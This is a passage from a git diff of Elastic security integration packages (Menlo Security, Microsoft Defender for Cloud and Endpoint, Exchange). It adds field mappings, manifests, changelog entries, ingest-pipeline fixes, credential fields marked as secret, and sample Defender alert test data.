or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| file.hash.sha256 | SHA256 hash. | keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword | +| host.os.build | OS build information. | keyword | +| host.os.codename | OS codename, if any. | keyword | +| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword | +| host.os.kernel | Operating system kernel version as a raw string. | keyword | +| host.os.name | Operating system name, without the version. | keyword | +| host.os.name.text | Multi-field of `host.os.name`. | text | +| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword | +| host.os.version | Operating system version as a raw string. | keyword | +| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | +| http.request.method | HTTP request method. The value should retain its casing from the original event. For example, `GET`, `get`, and `GeT` are all considered valid values for this field. | keyword | +| input.type | Input type | keyword | +| log.offset | Log offset | long | +| menlo.dlp.alerted | Whether or not an email alert was sent to a DLP Auditor profile | boolean | +| menlo.dlp.category | Category Rules Category type classification | keyword | +| menlo.dlp.ccl.id | Name of DLP dictionary that was violated | keyword | +| menlo.dlp.ccl.match_counts | Number of matches of the string that caused the violation | long | +| menlo.dlp.ccl.score | DLP score from the dictionary that caused the violation | long | +| menlo.dlp.status | Result from the DLP engine | keyword | +| menlo.dlp.stream_name | Internal name used for the file (usually working_file) or text stream (uid) | keyword | +| menlo.dlp.user_input | Whether or not this event was generated as a result of user form input | boolean | +| observer.product | The product name of the observer. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| observer.version | Observer version. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| rule.id | A rule ID that is unique within the scope of an agent, observer, or other entity using the rule for detection of this event. | keyword | +| rule.name | The name of the rule or signature generating the event. | keyword | +| tags | List of keywords used to tag each event. | keyword | +| url.domain | Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. | keyword | +| url.original | Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. | wildcard | +| url.original.text | Multi-field of `url.original`. | match_only_text | +| url.path | Path of the request, such as "/search". | wildcard | +| url.registered_domain | The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". | keyword | +| url.scheme | Scheme of the request, such as "https". Note: The `:` is not part of the scheme. | keyword | +| url.top_level_domain | The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". | keyword | +| user.name | Short name or login of the user. | keyword | +| user.name.text | Multi-field of `user.name`. | match_only_text | + diff --git a/packages/menlo/img/logo.png b/packages/menlo/img/logo.png new file mode 100644 index 00000000000..e9e1eeb9a9b Binary files /dev/null and b/packages/menlo/img/logo.png differ diff --git a/packages/menlo/manifest.yml b/packages/menlo/manifest.yml new file mode 100644 index 00000000000..9b22ff2c519 --- /dev/null +++ b/packages/menlo/manifest.yml @@ -0,0 +1,85 @@ +format_version: "3.0.2" +name: menlo +title: "Menlo Security" +version: 0.1.0 +source: + license: "Elastic-2.0" +description: "Collect logs from Menlo Security products with Elastic Agent" +type: integration +categories: + - monitoring + - network + - security +conditions: + kibana: + version: "^8.13.0" + elastic: + subscription: "basic" + capabilities: + - security +icons: + - src: /img/logo.png + title: Menlo Security logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: menlo + title: Menlo Security Logs + description: Collect Menlo Security logs + inputs: + - type: cel + title: Collect event from Menlo API + description: Collect Menlo Security logs via the Menlo Log API + vars: + - name: url + type: text + title: URL + description: URL for the Menlo Security API (Add https:// before the url). + default: https://logs.menlosecurity.com/api/rep/v1/fetch/client_select + show_user: true + required: true + - name: token + type: password + title: API key + secret: true + description: API key for the Menlo Security API. + required: true + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ39BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- +owner: + github: elastic/security-service-integrations + type: elastic diff --git a/packages/microsoft_defender_cloud/changelog.yml b/packages/microsoft_defender_cloud/changelog.yml index e3ea43e4c3e..00edfaccb95 100644 --- a/packages/microsoft_defender_cloud/changelog.yml +++ b/packages/microsoft_defender_cloud/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Add cloudsecurity_cdr sub category label + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 +- version: "1.1.0" + changes: + - description: Set sensitive values as secret and add missing mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml b/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml index 41f47ef3247..8bedce890af 100644 --- a/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml +++ b/packages/microsoft_defender_cloud/data_stream/event/fields/fields.yml @@ -107,6 +107,16 @@ fields: - name: ref type: keyword + - name: id + type: keyword + - name: type + type: keyword + - name: asset + type: boolean + - name: value + type: keyword + - name: algorithm + type: keyword - name: files type: group fields: @@ -238,6 +248,8 @@ type: keyword - name: protocol type: keyword + - name: ref + type: keyword - name: related_azure_resource_ids type: keyword - name: resource_id diff --git a/packages/microsoft_defender_cloud/data_stream/event/manifest.yml b/packages/microsoft_defender_cloud/data_stream/event/manifest.yml index 3bcc4ec4095..c1afa57281d 100644 --- a/packages/microsoft_defender_cloud/data_stream/event/manifest.yml +++ b/packages/microsoft_defender_cloud/data_stream/event/manifest.yml @@ -29,6 +29,7 @@ streams: multi: false required: true show_user: true + secret: true description: >- The connection string required to communicate with Azure Event Hubs. See [Get an Azure Event Hubs connection string](https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-get-connection-string) to learn more. - name: storage_account @@ -40,11 +41,12 @@ streams: description: >- The name of the storage account where the consumer group's state/offsets will be stored and updated. - name: storage_account_key - type: text + type: password title: Storage Account Key multi: false required: true show_user: true + secret: true description: >- The storage account key will be used to authorise access to data in your storage account. - name: storage_account_container diff --git a/packages/microsoft_defender_cloud/docs/README.md b/packages/microsoft_defender_cloud/docs/README.md index b676d49901c..28c460ada13 100644 --- a/packages/microsoft_defender_cloud/docs/README.md +++ b/packages/microsoft_defender_cloud/docs/README.md @@ -116,7 +116,12 @@ This is the `Event` dataset. | microsoft_defender_cloud.event.entities.elevation_token | | keyword | | microsoft_defender_cloud.event.entities.end_time_utc | | date | | microsoft_defender_cloud.event.entities.etag | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.algorithm | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.asset | | boolean | +| microsoft_defender_cloud.event.entities.file_hashes.id | | keyword | | microsoft_defender_cloud.event.entities.file_hashes.ref | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.type | | keyword | +| microsoft_defender_cloud.event.entities.file_hashes.value | | keyword | | microsoft_defender_cloud.event.entities.files.ref | | keyword | | microsoft_defender_cloud.event.entities.host.ref | | keyword | | microsoft_defender_cloud.event.entities.host_ip_address.ref | | keyword | @@ -166,6 +171,7 @@ This is the `Event` dataset. | microsoft_defender_cloud.event.entities.process_id | | keyword | | microsoft_defender_cloud.event.entities.project_id | | keyword | | microsoft_defender_cloud.event.entities.protocol | | keyword | +| microsoft_defender_cloud.event.entities.ref | | keyword | | microsoft_defender_cloud.event.entities.related_azure_resource_ids | | keyword | | microsoft_defender_cloud.event.entities.resource_id | | keyword | | microsoft_defender_cloud.event.entities.resource_name | | keyword | diff --git a/packages/microsoft_defender_cloud/manifest.yml b/packages/microsoft_defender_cloud/manifest.yml index a1913687631..0df7c71b14c 100644 --- a/packages/microsoft_defender_cloud/manifest.yml +++ b/packages/microsoft_defender_cloud/manifest.yml @@ -1,14 +1,15 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_defender_cloud title: Microsoft Defender for Cloud -version: "1.0.1" +version: "1.1.1" description: Collect logs from Microsoft Defender for Cloud with Elastic Agent. type: integration categories: - security + - cloudsecurity_cdr conditions: kibana: - version: ^8.3.0 + version: ^8.12.0 elastic: subscription: basic screenshots: diff --git a/packages/microsoft_defender_endpoint/changelog.yml b/packages/microsoft_defender_endpoint/changelog.yml index b9b3118c9fc..f8314cd2924 100644 --- a/packages/microsoft_defender_endpoint/changelog.yml +++ b/packages/microsoft_defender_endpoint/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "2.24.2" + changes: + - description: Fix bug handling message field when events are received from Logstash with `ecs_compatibility` turned on. + type: bugfix + link: https://github.com/elastic/integrations/pull/9522 +- version: "2.24.1" + changes: + - description: Fix handling of empty arrays. + type: bugfix + link: https://github.com/elastic/integrations/pull/9338 +- version: "2.24.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "2.23.3" + changes: + - description: Clean up null handling + type: bugfix + link: https://github.com/elastic/integrations/pull/9176 - version: "2.23.2" changes: - description: Changed owners diff --git a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log index c673f5b73aa..c03b3507a96 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log +++ b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log @@ -2,4 +2,5 @@ {"id":"da637291048912199236_1126926584","incidentId":11,"investigationId":7,"assignedTo":null,"severity":"Medium","status":"New","classification":null,"determination":null,"investigationState":"TerminatedByUser","detectionSource":"WindowsDefenderAtp","category":"DefenseEvasion","threatFamilyName":null,"title":"Suspicious process injection observed","description":"A process abnormally injected code into another process, As a result, unexpected code may be running in the target process memory. Injection is often used to hide malicious code execution within a trusted process. \nAs a result, the target process may exhibit abnormal behaviors such as opening a listening port or connecting to a command and control server.","alertCreationTime":"2020-06-30T09:08:11.1084877Z","firstEventTime":"2020-06-30T09:04:56.8490679Z","lastEventTime":"2020-06-30T09:45:39.5484377Z","lastUpdateTime":"2020-06-30T15:29:44.7733333Z","resolvedTime":null,"machineId":"543bc5a964f417c11f6277d5bf9489f0d","computerDnsName":"testserver4","rbacGroupName":null,"aadTenantId":"123543-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":{"userName":"administrator1","domainName":"TestServer4"},"comments":[],"evidence":{"entityType":"Process","sha1":"b6d237154f2e528f0b503b58b025862d66b02b73","sha256":"a92056d772260b39a876d01552496b2f8b4610a0b1e084952fe1176784e2ce77","fileName":"notepad.exe","filePath":"C:\\Windows\\System32","processId":4104,"processCommandLine":"\"notepad.exe\"","processCreationTime":"2020-06-30T09:45:38.9784654Z","parentProcessId":6012,"parentProcessCreationTime":"2020-06-30T09:04:51.487396Z","ipAddress":null,"url":null,"accountName":null,"domainName":null,"userSid":null,"aadUserId":null,"userPrincipalName":null}} {"id":"da637291048912199236_1126926584","incidentId":11,"investigationId":7,"assignedTo":null,"severity":"Medium","status":"New","classification":null,"determination":null,"investigationState":"TerminatedByUser","detectionSource":"WindowsDefenderAtp","category":"DefenseEvasion","threatFamilyName":null,"title":"Suspicious process injection observed","description":"A process abnormally injected code into another process, As a result, unexpected code may be running in the target process memory. Injection is often used to hide malicious code execution within a trusted process. \nAs a result, the target process may exhibit abnormal behaviors such as opening a listening port or connecting to a command and control server.","alertCreationTime":"2020-06-30T09:08:11.1084877Z","firstEventTime":"2020-06-30T09:04:56.8490679Z","lastEventTime":"2020-06-30T09:45:39.5484377Z","lastUpdateTime":"2020-06-30T15:29:44.7733333Z","resolvedTime":null,"machineId":"53425a964f417c11f6277d5bf9489f0d","computerDnsName":"testserver4","rbacGroupName":null,"aadTenantId":"43521344-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":{"userName":"administrator1","domainName":"TestServer4"},"comments":[],"evidence":{"entityType":"User","sha1":null,"sha256":null,"fileName":null,"filePath":null,"processId":null,"processCommandLine":null,"processCreationTime":null,"parentProcessId":null,"parentProcessCreationTime":null,"ipAddress":null,"url":null,"accountName":"administrator1","domainName":"TestServer4","userSid":"S-1-5-21-46152456-1367606905-4031241297-500","aadUserId":null,"userPrincipalName":null}} {"id":"da637291063515066999_-2102938302","incidentId":12,"investigationId":9,"assignedTo":"Automation","severity":"Informational","status":"Resolved","classification":null,"determination":null,"investigationState":"Benign","detectionSource":"WindowsDefenderAv","category":"Malware","threatFamilyName":null,"title":"'Mountsi' malware was detected","description":"Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nThis detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.","alertCreationTime":"2020-06-30T09:32:31.4579225Z","firstEventTime":"2020-06-30T09:31:22.5729558Z","lastEventTime":"2020-06-30T09:46:15.0876676Z","lastUpdateTime":"2020-06-30T11:13:12.9Z","resolvedTime":"2020-06-30T11:13:12.2680434Z","machineId":"t4563234bc5a964f417c11f6277d5bf9489f0d","computerDnsName":"TESTSERVER4","rbacGroupName":null,"aadTenantId":"1234543-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":null,"comments":[],"evidence":{"entityType":"File","sha1":"ffb1670c6c6a9c5b4c5cea8b6b8e68d62e7ff281","sha256":"fd46705c4f67a8ef16e76259ca6d6253241e51a1f8952223145f92aa1907d356","fileName":"amsistream-1D89ECED25A52AB98B76FF619B7BA07A","filePath":null,"processId":null,"processCommandLine":null,"processCreationTime":null,"parentProcessId":null,"parentProcessCreationTime":null,"ipAddress":null,"url":null,"accountName":null,"domainName":null,"userSid":null,"aadUserId":null,"userPrincipalName":null}} +{"id":"da637291063515066999_-2102938302","incidentId":12,"investigationId":9,"assignedTo":"Automation","severity":"Informational","status":"Resolved","classification":null,"determination":null,"investigationState":"Benign","detectionSource":"WindowsDefenderAv","category":"Malware","threatFamilyName":null,"title":"'Mountsi' malware was detected","description":"Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nThis detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.","alertCreationTime":"2020-06-30T09:32:31.4579225Z","firstEventTime":"2020-06-30T09:31:22.5729558Z","lastEventTime":"2020-06-30T09:46:15.0876676Z","lastUpdateTime":"2020-06-30T11:13:12.9Z","resolvedTime":"2020-06-30T11:13:12.2680434Z","machineId":"t4563234bc5a964f417c11f6277d5bf9489f0d","computerDnsName":"TESTSERVER4","rbacGroupName":null,"aadTenantId":"1234543-d66c-4c7e-9e30-40034eb7c6f3","relatedUser":null,"comments":[],"evidence":[]} {"value":[]} diff --git a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json index d6773ff07b5..9de673dfa02 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json +++ b/packages/microsoft_defender_endpoint/data_stream/log/_dev/test/pipeline/test-defenderatp.log-expected.json @@ -357,6 +357,80 @@ } } }, + { + "cloud": { + "account": { + "id": "1234543-d66c-4c7e-9e30-40034eb7c6f3" + }, + "instance": { + "id": "t4563234bc5a964f417c11f6277d5bf9489f0d" + }, + "provider": "azure" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Malware", + "category": [ + "host", + "malware" + ], + "created": "2020-06-30T09:32:31.4579225Z", + "duration": 892514711800, + "end": "2020-06-30T09:46:15.0876676Z", + "id": "da637291063515066999_-2102938302", + "kind": "alert", + "original": "{\"id\":\"da637291063515066999_-2102938302\",\"incidentId\":12,\"investigationId\":9,\"assignedTo\":\"Automation\",\"severity\":\"Informational\",\"status\":\"Resolved\",\"classification\":null,\"determination\":null,\"investigationState\":\"Benign\",\"detectionSource\":\"WindowsDefenderAv\",\"category\":\"Malware\",\"threatFamilyName\":null,\"title\":\"'Mountsi' malware was detected\",\"description\":\"Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\\n\\nThis detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.\",\"alertCreationTime\":\"2020-06-30T09:32:31.4579225Z\",\"firstEventTime\":\"2020-06-30T09:31:22.5729558Z\",\"lastEventTime\":\"2020-06-30T09:46:15.0876676Z\",\"lastUpdateTime\":\"2020-06-30T11:13:12.9Z\",\"resolvedTime\":\"2020-06-30T11:13:12.2680434Z\",\"machineId\":\"t4563234bc5a964f417c11f6277d5bf9489f0d\",\"computerDnsName\":\"TESTSERVER4\",\"rbacGroupName\":null,\"aadTenantId\":\"1234543-d66c-4c7e-9e30-40034eb7c6f3\",\"relatedUser\":null,\"comments\":[],\"evidence\":[]}", + "provider": "defender_endpoint", + "severity": 1, + "start": "2020-06-30T09:31:22.5729558Z", + "timezone": "UTC", + "type": [ + "end" + ] + }, + "host": { + "hostname": "TESTSERVER4", + "name": "testserver4" + }, + "message": "'Mountsi' malware was detected", + "microsoft": { + "defender_endpoint": { + "assignedTo": "Automation", + "incidentId": "12", + "investigationId": "9", + "investigationState": "Benign", + "lastUpdateTime": "2020-06-30T11:13:12.9Z", + "resolvedTime": "2020-06-30T11:13:12.2680434Z", + "status": "Resolved" + } + }, + "observer": { + "name": "WindowsDefenderAv", + "product": "Defender for Endpoint", + "vendor": "Microsoft" + }, + "related": { + "hosts": [ + "testserver4" + ] + }, + "rule": { + "description": "Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.\n\nThis detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection." + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "framework": "MITRE ATT&CK", + "technique": { + "name": [ + "Malware" + ] + } + } + }, null ] } \ No newline at end of file diff --git a/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 5ea6d9d7bca..3f10b215665 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/microsoft_defender_endpoint/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -9,11 +9,16 @@ processors: target_field: event.original ignore_missing: true if: ctx.event?.original == null + - remove: + field: message + ignore_missing: true + if: 'ctx.event?.original != null' + description: 'The `message` field is no longer required if the document has an `event.original` field. Helps to maintain compatibility with the Logstash `ecs_compatibility feature`.' - json: field: event.original target_field: json - drop: - if: ctx.json?.value != null && ctx.json.value.isEmpty() + if: ctx.json?.value?.isEmpty() == true - remove: field: - json.comments @@ -26,7 +31,7 @@ processors: ######################### - script: lang: painless - if: ctx?.json != null + if: ctx.json != null params: values: - null @@ -34,12 +39,12 @@ processors: - "-" - "N/A" source: | - if (!ctx['json'].empty) { + if (!ctx.json.empty) { ctx.json.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); } - script: lang: painless - if: ctx?.json?.evidence != null + if: ctx.json?.evidence != null params: values: - null @@ -47,9 +52,22 @@ processors: - "-" - "N/A" source: | - if (!ctx.json['evidence'].empty) { + boolean drop(Object o) { + if (o == null || o == "") { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + if (!ctx.json.evidence.empty) { ctx.json.evidence.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); } + drop(ctx); - set: field: cloud.provider value: azure @@ -149,10 +167,10 @@ processors: if: ctx.json?.severity == 'High' - script: lang: painless - if: "ctx?.event?.start != null && ctx?.event?.end != null" + if: ctx.event?.start != null && ctx.event?.end != null source: > - Instant eventstart = ZonedDateTime.parse(ctx?.event?.start).toInstant(); - Instant eventend = ZonedDateTime.parse(ctx?.event?.end).toInstant(); + Instant eventstart = ZonedDateTime.parse(ctx.event.start).toInstant(); + Instant eventend = ZonedDateTime.parse(ctx.event.end).toInstant(); ctx.event['duration'] = ChronoUnit.NANOS.between(eventstart, eventend); ######################## @@ -237,11 +255,11 @@ processors: field: json.evidence.url target_field: url.full ignore_missing: true - if: ctx?.json?.evidence?.url != null + if: ctx.json?.evidence?.url != null - uri_parts: field: url.full ignore_failure: true - if: ctx?.url?.full != null + if: ctx.url?.full != null ###################### ## ECS Host Mapping ## @@ -320,7 +338,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml b/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml index 6f03015d5a2..ea059cd3bd7 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml +++ b/packages/microsoft_defender_endpoint/data_stream/log/manifest.yml @@ -21,12 +21,13 @@ streams: show_user: false description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details. - name: client_secret - type: text + type: password title: Client Secret description: The secret related to the client ID. multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID @@ -78,6 +79,7 @@ streams: show_user: false default: oauth2/token description: "Microsoft supports multiple Oauth2 URL endpoints, the default is oauth2/token, but can also be oauth2/v2.0/token" + secret: false - name: request_url type: text title: Security Center URL diff --git a/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json b/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json index 5850c1f0c80..03136a3f89e 100644 --- a/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json +++ b/packages/microsoft_defender_endpoint/data_stream/log/sample_event.json @@ -108,4 +108,4 @@ "id": "S-1-5-21-11111607-1111760036-109187956-75141", "name": "temp123" } -} +} \ No newline at end of file diff --git a/packages/microsoft_defender_endpoint/docs/README.md b/packages/microsoft_defender_endpoint/docs/README.md index 3be14539d9e..2ea1439dd51 100644 --- a/packages/microsoft_defender_endpoint/docs/README.md +++ b/packages/microsoft_defender_endpoint/docs/README.md @@ -157,7 +157,6 @@ An example event for `log` looks as following: "name": "temp123" } } - ``` **Exported fields** diff --git a/packages/microsoft_defender_endpoint/manifest.yml b/packages/microsoft_defender_endpoint/manifest.yml index 1af3c4880a3..bc33e45e7d0 100644 --- a/packages/microsoft_defender_endpoint/manifest.yml +++ b/packages/microsoft_defender_endpoint/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_defender_endpoint title: Microsoft Defender for Endpoint -version: "2.23.2" +version: "2.24.2" description: Collect logs from Microsoft Defender for Endpoint with Elastic Agent. categories: - "security" @@ -9,7 +9,7 @@ categories: type: integration conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 policy_templates: - name: microsoft_defender_endpoint title: Microsoft Defender for Endpoint diff --git a/packages/microsoft_exchange_online_message_trace/changelog.yml b/packages/microsoft_exchange_online_message_trace/changelog.yml index c4c644c7744..f8e4bcce547 100644 --- a/packages/microsoft_exchange_online_message_trace/changelog.yml +++ b/packages/microsoft_exchange_online_message_trace/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.18.1" changes: - description: Changed owners diff --git a/packages/microsoft_exchange_online_message_trace/manifest.yml b/packages/microsoft_exchange_online_message_trace/manifest.yml index e4fa57173d5..b97284ff14e 100644 --- a/packages/microsoft_exchange_online_message_trace/manifest.yml +++ b/packages/microsoft_exchange_online_message_trace/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: microsoft_exchange_online_message_trace title: "Microsoft Exchange Online Message Trace" -version: "1.18.1" +version: "1.19.0" description: "Microsoft Exchange Online Message Trace Integration" type: integration categories: @@ -9,7 +9,7 @@ categories: - email_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" elastic: subscription: "basic" icons: @@ -52,6 +52,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: tenant_id type: text title: Tenant ID @@ -87,6 +88,7 @@ policy_templates: show_user: false default: oauth2/v2.0/token description: Microsoft Identity Platform OAuth2 token endpoint + secret: false - name: azure_resource type: text title: Azure Resource diff --git a/packages/microsoft_exchange_server/_dev/build/build.yml b/packages/microsoft_exchange_server/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/microsoft_exchange_server/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/microsoft_exchange_server/changelog.yml b/packages/microsoft_exchange_server/changelog.yml new file mode 100644 index 00000000000..4de89e3a3af --- /dev/null +++ b/packages/microsoft_exchange_server/changelog.yml @@ -0,0 +1,16 @@ +# newer versions go on top +- version: "0.1.2" + changes: + - description: Fix Recipientstatus field type, add custom processor support & adjust docs + type: bugfix + link: https://github.com/elastic/integrations/pull/9349 +- version: "0.1.1" + 